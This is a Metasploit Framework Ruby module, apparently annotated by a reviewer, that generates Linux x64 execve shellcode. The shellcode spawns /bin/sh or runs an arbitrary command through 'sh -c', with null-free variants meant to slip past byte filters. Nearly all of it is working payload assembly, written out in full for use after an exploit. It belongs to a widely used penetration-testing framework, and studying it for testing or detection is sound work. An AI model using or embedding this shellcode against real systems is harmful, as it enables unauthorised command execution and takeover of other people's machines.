Path: blob/master/modules/payloads/singles/linux/x64/exec.rb
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

#
# Linux x64 "exec" single: assembles a tiny execve() shellcode with Metasm at
# generate time.
#
# Two shapes are produced depending on the CMD option:
#   CMD empty : execve("/bin/sh", NULL, NULL)
#   CMD set   : execve("/bin/sh", ["/bin/sh", "-c", CMD], NULL)
#
# Each shape exists in a default variant and a NullFreeVersion variant. The
# null-free variants avoid 0x00 in the emitted bytes by using the 8-character
# path "//bin/sh" (the 64-bit immediate then has no zero byte), pushing rdx
# (zeroed by cdq) as the string terminator, and NUL-terminating CMD at run
# time instead of embedding a 0x00 after it.
#
# Every variant ends in `push 0x3b / pop rax / syscall`, i.e. execve(2) of a
# shell; that syscall is what a syscall-level monitor sees regardless of the
# variant chosen.
#
module MetasploitModule
  # Size recorded for the framework's payload cache. It matches neither of the
  # bare stub sizes quoted in the comments below (21/22 bytes), so it
  # presumably reflects the payload as the cache measures it with default
  # options — confirm before editing.
  CachedSize = 44

  include Msf::Payload::Single
  # NOTE(review): presumably contributes the Linux x64 prepend options/stubs
  # emitted ahead of the shellcode built here; see that mixin.
  include Msf::Payload::Linux::X64::Prepends

  # Registers module metadata and options.
  #
  # Options:
  #   CMD             (optional) command run via "/bin/sh -c"; unset or empty
  #                   means just spawn /bin/sh.
  #   NullFreeVersion (advanced, default false) selects the null-free stubs.
  def initialize(info = {})
    super(
      merge_info(
        info,
        'Name' => 'Linux Execute Command',
        'Description' => 'Execute an arbitrary command or just a /bin/sh shell',
        'Author' => [
          'ricky',
          'Geyslan G. Bem <geyslan[at]gmail.com>'
        ],
        'License' => MSF_LICENSE,
        'Platform' => 'linux',
        'Arch' => ARCH_X64
      )
    )

    register_options(
      [
        OptString.new('CMD', [ false, 'The command string to execute' ]),
      ]
    )
    register_advanced_options(
      [
        OptBool.new('NullFreeVersion', [ true, 'Null-free shellcode version', false ])
      ]
    )
  end

  # Assembles the shellcode for the current datastore and returns its raw
  # bytes.
  #
  # @param _opts [Hash] unused; kept for the Msf::Payload#generate interface
  # @return [String] assembled x64 machine code (Metasm encode_string output)
  # @raise [RangeError] in the null-free variant when CMD is longer than
  #   0xffff characters (the length must fit the 16-bit bx immediate)
  def generate(_opts = {})
    # nil and "" both select the plain /bin/sh stub.
    cmd = datastore['CMD'] || ''
    nullfreeversion = datastore['NullFreeVersion']

    if cmd.empty?
      #
      # Builds the exec payload which executes a /bin/sh shell.
      # execve("/bin/sh", NULL, NULL)
      #
      if nullfreeversion
        # 22 bytes (null-free)
        # "//bin/sh" fills all 8 bytes of the immediate, so a zeroed rdx is
        # pushed first to act as the string terminator.
        payload = <<-EOS
          mov rax, 0x68732f6e69622f2f
          cdq                           ; edx = NULL

          push rdx
          push rax
          push rsp
          pop rdi                       ; "//bin/sh"

          push rdx
          pop rsi                       ; NULL

          push 0x3b
          pop rax

          syscall                       ; execve("//bin/sh", NULL, NULL)
        EOS
      else
        # 21 bytes (not null-free)
        # The 7-byte immediate "/bin/sh" leaves the top byte of rax as 0x00,
        # which doubles as the string terminator (and is why this variant is
        # not null-free).
        payload = <<-EOS
          mov rax, 0x68732f6e69622f
          cdq                           ; edx = NULL

          push rax
          push rsp
          pop rdi                       ; "/bin/sh"

          push rdx
          pop rsi                       ; NULL

          push 0x3b
          pop rax

          syscall                       ; execve("/bin/sh", NULL, NULL)
        EOS
      end
    else
      #
      # Dynamically builds the exec payload based on the user's options.
      # execve("/bin/sh", ["/bin/sh", "-c", "CMD"], NULL)
      #
      # Raw opcode bytes for `pushw 0x632d` ("-c"), emitted through dd since
      # metasm has no pushw mnemonic.
      pushw_c_opt = 'dd 0x632d6866' # pushw 0x632d (metasm doesn't support pushw)

      if nullfreeversion
        # The CMD length is loaded into bl or bx, so it must fit 16 bits.
        # (The message says "smaller than", but the check permits exactly 0xffff.)
        if cmd.length > 0xffff
          raise RangeError, 'CMD length has to be smaller than %d' % 0xffff, caller
        end

        # Pick the narrowest register whose immediate encodes without 0x00:
        # bl for 1..255 (cmd is non-empty in this branch, so never 0); bx
        # above that, padding CMD by one byte when the low byte of its length
        # would otherwise be 0x00.
        if cmd.length <= 0xff # 255
          breg = 'bl'
        else
          breg = 'bx'
          if (cmd.length & 0xff) == 0 # let's avoid zeroed bytes
            # NOTE(review): the rendering of this source breaks this literal
            # across two lines; a single trailing space is assumed here —
            # confirm against upstream.
            cmd += ' '
          end
        end
        # Limitation: String#length counts characters while `db` below emits
        # bytes, so a non-ASCII CMD is not handled — the run-time NUL store
        # would land at the wrong offset. Documented, not fixed.
        mov_cmd_len_to_breg = "mov #{breg}, #{cmd.length}"

        # 48 bytes without cmd (null-free)
        # jmp/call/pop leaves the address of the trailing CMD bytes in rbp; the
        # `mov [rbp + rbx], dl` store then writes the terminating 0x00 into the
        # shellcode's own data, so the memory it runs from must be writable as
        # well as executable. The '\0' inside the heredoc comment is a Ruby
        # escape (a NUL byte in the assembler comment text, not in the emitted
        # code) — presumably ignored by Metasm.
        payload = <<-EOS
          mov rax, 0x68732f6e69622f2f
          cdq                           ; edx = NULL

          jmp tocall                    ; jmp/call/pop cmd address
          afterjmp:
          pop rbp                       ; *CMD*

          push rdx
          pop rbx
          #{mov_cmd_len_to_breg}        ; mov (byte/word) (bl/bx), cmd.length
          mov [rbp + rbx], dl           ; NUL '\0' terminate cmd

          push rdx
          #{pushw_c_opt}
          push rsp
          pop rsi                       ; "-c"

          push rdx
          push rax
          push rsp
          pop rdi                       ; "//bin/sh"

          push rdx                      ; NULL
          push rbp                      ; *CMD*
          push rsi                      ; "-c"
          push rdi                      ; "//bin/sh"
          push rsp
          pop rsi                       ; ["//bin/sh", "-c", "*CMD*"]

          push 0x3b
          pop rax

          syscall                       ; execve("//bin/sh", ["//bin/sh", "-c", "*CMD*"], NULL)
          tocall:
          call afterjmp
          db "#{cmd}"                   ; arbitrary command
        EOS
      else
        # 37 bytes without cmd (not null-free)
        # `call continue` pushes the address of the db'd CMD as its return
        # address, and that slot is reused directly as the argv[2] pointer; the
        # terminating 0x00 is embedded after the command (hence not null-free).
        payload = <<-EOS
          mov rax, 0x68732f6e69622f
          cdq                           ; edx = NULL

          push rax
          push rsp
          pop rdi                       ; "/bin/sh"

          push rdx
          #{pushw_c_opt}
          push rsp
          pop rsi                       ; "-c"

          push rdx                      ; NULL
          call continue
          db "#{cmd}", 0x00             ; arbitrary command
          continue:
          push rsi                      ; "-c"
          push rdi                      ; "/bin/sh"
          push rsp
          pop rsi                       ; ["/bin/sh", "-c", "*CMD*"]

          push 0x3b
          pop rax

          syscall                       ; execve("/bin/sh", ["/bin/sh", "-c", "*CMD*"], NULL)
        EOS
      end
    end
    # Assemble the text into raw machine code. CMD is interpolated verbatim
    # into the assembler source (db "..."), so a value containing characters
    # Metasm's string parser treats specially (e.g. a double quote) would
    # presumably break assembly rather than be escaped.
    Metasm::Shellcode.assemble(Metasm::X64.new, payload).encode_string
  end
end